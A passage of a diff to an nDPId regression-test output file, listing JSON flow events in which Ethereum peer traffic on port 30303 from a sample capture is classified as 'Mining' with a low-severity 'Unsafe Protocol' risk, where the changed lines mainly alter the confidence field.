+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 